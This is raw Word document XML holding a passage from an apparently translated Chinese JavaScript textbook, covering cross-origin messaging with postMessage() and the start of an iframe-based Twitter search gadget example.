        <w:t>#mid{background-color:green;}</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r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>下面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素是游戏的</w:t>
      </w:r>
      <w:r>
        <w:t>UI--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>游戏标题和数字猜测范围的文本表示</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1 id="heading"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>I'm thinking of a number...</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>用于确保猜测的数字在有效范围内</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td id="low"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td id="mid"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td id="high"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>用户输入猜测数字的地方</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>label id="prompt"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/label</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="input"type="text"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/b</w:t>
      </w:r>
      <w:r>
        <w:t>ody</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="551" w:name="22_3_Kua_Yu_Xiao_Xi_Chuan_Di_"/>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　跨域消息传递</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如</w:t>
      </w:r>
      <w:r>
        <w:t>14.8</w:t>
      </w:r>
      <w:r>
        <w:t>节提到的，一些浏览器窗口和标签之间都是完全相互独立的，在其中一个窗口或者标签中运行的代码在其他窗口或标签中完全无法识别。但是，在其他的一些场景下，当脚本显式打开一个新窗口或者在嵌套的窗体中运行的时候，多个窗口或者窗体之间是互相可识别的。如果它们包含的文档是来自同一台</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器，则再这些窗口和窗体中的脚本可以互相之间进行交互和操作对方的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>然而，有的时候，尽管脚本可以引用其他的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但是由于那个窗口中的内容是来自于不同的源，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器（遵循同源策略）不会允许访问其他窗口中的文档内容。大部分情况下，浏览器还不允许脚本读取其他窗口的属性或调用其他窗口方法。不过有个</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>方法，是允许来自非同源脚本调用的：</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，该方法允许有限的通信</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>通过异步消息传递的方式</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>在来自不同源的脚本之间。这类通信机制是在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准中定义的，所有主流的浏览器（包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>和更新版本）都已经实现了该通信机制。这项技术称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>跨文档消息传递</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，而由于该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是定义在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的，而不是文档对象上的，因此，它又称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>窗口间消息</w:t>
      </w:r>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>跨域消息传递</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受两个参数。其中第一个参数是要传递的消息。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准提到，该参数可以是任意基本类型值或者可以复制的对象（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>），但是，有些当前浏览器（包括</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4 beta</w:t>
      </w:r>
      <w:r>
        <w:t>版本）的实现只支持字符串，因此，如果想要作为消息传递对象或者数组，首先应当使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）对其序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其中第二个参数是一个字符串，指定目标窗口的源。其中包括协议、主机名以及</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（可选的）端口部分（可以传递一个完</w:t>
      </w:r>
      <w:r>
        <w:t>整的</w:t>
      </w:r>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:t>，但是除了协议、主机名和端口号之外的任何信息都会忽略）。这是一个安全特性：由于恶意代码或普通用户都可以在窗口中浏览新的未知文档，因此</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>只会将消息传递给指定的窗口，而不会传递给包含非同源文档的窗口。当然，如果传递的消息不包含任何敏感信息的话，并且愿意将其传递给任何窗口，就可以直接将该参数设置成</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>通配符即可。如果要指定和当前窗口同源的话，那么也可以简单地使用</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定的源匹配的话，那么当调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候，在目标窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上就会触发</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件。在目标窗口中的脚本则可以定义通知</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序函数。调用该事件处理程序的时候会传递给它一个拥有如下属性的事件对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为第一个参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的消息内容副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>消息源自的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个字符串，指定消息来源（</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>形式）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通常，</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage()</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序应当首先检测其中的</w:t>
      </w:r>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:t>属性，忽略来自未知源的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当想要在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>页面中嵌入一个来自其他站点的模块或者</w:t>
      </w:r>
      <w:r>
        <w:t>"gadget"</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，利用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件实现的跨域消息传递是很有用的。当然，如果</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>本身就很简单并且又是自包含的，就可以直接简单地将它放在＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中实现隔离即可。然而，假设</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>本身比较复杂，它自身还定义了一些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，同时</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面需要利用这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和它进行交互。这个时候，用＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞就不行了，而如果将它嵌入在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中，它可以提供一个正常的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>，但是同时它也可以完全操控页</w:t>
      </w:r>
      <w:r>
        <w:t>面和页面内容了。目前在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>上通常不会这样去做（尤其是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>广告），哪怕信任第三方站点，这也不是个好的方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>跨域消息传递提供了另外一种实现方案：首先</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>的开发者可以将</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>内容定义在一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面中，它负责监听</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件，并将它们分发给对应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数去处理。然后，嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面就可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传递消息来和</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>进行交互了。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-4</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>22-5</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何使用该方案。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-4</w:t>
      </w:r>
      <w:r>
        <w:t>是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>，放置在＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>中，它搜索</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>并将匹配</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指定搜索项的</w:t>
      </w:r>
      <w:r>
        <w:t>tweet</w:t>
      </w:r>
      <w:r>
        <w:t>显示出来。要让它实现真正的搜索功能，包含的页面只需要简单地作为消息传递搜索项给它即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-4</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>，由</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>来控制</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>。将它通过</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>的形式内嵌在任何</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将查询字符串传递给它来搜索</w:t>
      </w:r>
      <w:r>
        <w:t>tweet</w:t>
      </w:r>
      <w:r>
        <w:t>。由于它是内嵌在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中而不是＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，因此它无法对内嵌它的页</w:t>
      </w:r>
      <w:r>
        <w:t>面造成破坏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w: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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>body{font:9pt sans-serif;}</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="http://code.jquery.com/jquery-1.4.4.min.js"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>原本只要能够使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了，但是考虑到早期的浏览器（比如：</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3</w:t>
      </w:r>
      <w:r>
        <w:t>）不支持它，因此，采用如下兼容方式实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>(window.addEventListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("message",handleMessage,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.attachEvent("onmessage",handleMessage);//For IE8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function handleMessage(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>不在意消息来源：愿意接受任何来源的</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是，希望消息源自内嵌</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>的窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.source!==window.parent)retur</w:t>
      </w:r>
      <w:r>
        <w:t>n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var searchterm=e.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>获取搜索内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数以及</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>的搜索</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来查找匹配消息的</w:t>
      </w:r>
      <w:r>
        <w:t>tweet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getJSON("http://search.twitter.com/search.json?callback=?",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{q:searchterm},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(data){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用请求结果调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tweets=data.results;//</w:t>
      </w:r>
      <w:r>
        <w:t>构造一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来显示搜索结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
